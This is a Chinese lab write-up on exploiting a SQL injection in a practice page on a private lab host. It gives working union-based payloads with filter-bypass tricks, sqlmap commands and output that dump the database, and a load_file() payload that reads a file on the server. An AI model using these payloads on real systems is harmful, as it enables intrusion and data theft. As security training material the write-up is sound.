题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件

目录

题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件

首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入)

用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union)

发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。


首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入)

可以看到id=1的回显页面,结合回显语句发现该页面屏蔽了union、<?php?>、空格

所以:

  1. 用/**/来显示空格
  2. 用union双写绕过

输入url:http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')#

执行语句为:select * from article where id= ('1')#')


去order by查字段、判断只有4个字段

http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4#

显示回显页面

http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/5#

不显示回显页面


然后用union联合注入查询:

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,3,4#


进行爆表与爆库以及字段:(group_concat()函数:把分行的字段内容都显示为一行)

1、select group_concat(table_name) from information_schema.tables where table_schema=database()

  • 爆表名:

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1%27)/**/uniunionon/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),4%23

  • 数据库:information_schema
  • 表:tables
  • 字段:table_name


2、select group_concat(column_name) from information_schema.columns where table_name='表名'

  • 爆字段:

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1%27)/**/uniunionon/**/select/**/1,2,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/column_name=%27article%27),4%23

  • 数据库:infomation_schema
  • 表:columns
  • 字段:column_name

可以推断出:

  1. 当前数据库`2web`
  2. 当前表article
  3. article字段有id,title,content,author

用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union)

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py"

注入类型为:boolean-based blind、time-based blind

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1') AND 1028=1028 AND ('OXUg'='OXUgType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1') AND (SELECT 7895 FROM (SELECT(SLEEP(5)))sSoM) AND ('YhuC'='YhuC
---

列出数据库:

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py" --dbs


列出`2web`数据库中的表

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py" -D `2web` --tables


列出`2web`数据库的article表中的内容:

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py" -D `2web` -T article --dump


发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。

已知文件的绝对路径,直接去进行load_file()函数查看本地文件

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,load_file('/tmp/360/key'),4#

最终找到了key8的值

SQL注入题型(手工注入+sqlmap)相关推荐

  1. 【愚公系列】2023年05月 网络安全高级班 065.WEB渗透与安全(SQL注入漏洞-手工注入)

    文章目录 前言 一.SQL注入漏洞-手工注入 1.错误注入 2.布尔注入 2.1 通过`'or 1=1 --` 注入 2.2 通过`admin'or 1=1 --` 注入 3.联合注入 3.1 查看u ...

  2. mysql报错型手工注入_mysql手工注入教程

    大家早上好!,H.U.C-枫 又和大家见面啦// 本来早想做这个教程的,因为前段时间做过一套mssql的手工注入教程.今天给大家带来的是php+mysql 手工注入.临时找了个点,所以有些东西不能全给 ...

  3. mssql注入和mysql注入_mssql手工注入

    mssql注入是针对于sql server数据库的 sql server数据库和mysql数据库是有所区别的,语句命令之类的可自行百度. 平台:i春秋 内容:mssql手工注入 找注入点 点击test ...

  4. mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析

    前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...

  5. mysql报错注入实战_手工注入——MySQL手工注入实战和分析

    今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...

  6. [网络安全提高篇] 一〇六.SQL注入之手工注入和SQLMAP入门案例详解

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  7. 【SQL注入】手工注入常用语句合集

    直接就能用的常用语句 一.注入前的准备:爆闭合 0x1 整形的闭合 SELECT * FROM users WHERE id=$id LIMIT 0,1?id=3 #用户输入 3 ?id=3 -- - ...

  8. write up:web 实战2-注入--sql注入(手工注入详细版)

    0x00查找注入点 我是通过展开html标签来找注入点的 注入点 www.kabelindo.co.id/readnews.php?id=28 下面开始盘它!!! 0x01 手动注入 先确定字段数目 ...

  9. python sql注入脚本_python辅助sql手工注入猜解数据库案例分析

    发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...

最新文章

  1. Response.getWriter() 和Response.getOutputStream冲突
  2. centertrack
  3. Action profile: ZAVADDR和ZAVPERS
  4. java台球游戏设计原理_Java实现简单台球游戏
  5. sparkstreaming 读取mysql_SparkStreaming读取Kafka的两种方式
  6. Hibernate异常之关键字错误
  7. Java高级面试题!这是一份面向Java开发者的复习指南
  8. Sublime Text 3 Plugin Better!
  9. java ajax框架_ajax框架之 zk -demo1
  10. HDU 6098 Inversion 思维
  11. 渗透第一个靶机 shop1.0 (还是简单渗透版)
  12. python算法书籍-推荐 10 本程序员必读的算法书
  13. Python根据地名获取经纬度
  14. python智能抠图
  15. 问卷调查怎么帮助餐饮行业?
  16. win7计算机网络机组用户名,win7连接局域网时的用户名及网络密码是什么?
  17. iOS7下的drawInRect的新方法drawInRect:withAttributes:使用
  18. Python 快速打开网页
  19. 使用Java生成带有下划线字体的文字
  20. 软件产业向互联网转型正当时

热门文章

  1. 不能装载文档控件。请在检查浏览器的选项中检查浏览器的安全设置_网络安全科普 | 如何正确设置浏览器!...
  2. OpenBMC环境搭建及测试
  3. Arduino UNO AT24C32进行字符串数据读写【优化篇】
  4. yolov5 代码内容解析
  5. HADOOP KMS使用介绍及性能测试
  6. Mac下文本编辑器无法生成html文件
  7. dot.tk+namecheap.com搭建免费顶级域名+快速动态域名+Dns解析
  8. C#大作业(FPS大型单机游戏)笔记简记
  9. 今天14:00 | NeurIPS 专场一 青年科学家专场
  10. eclipse设置pom.xml打开方式,显示dependences视图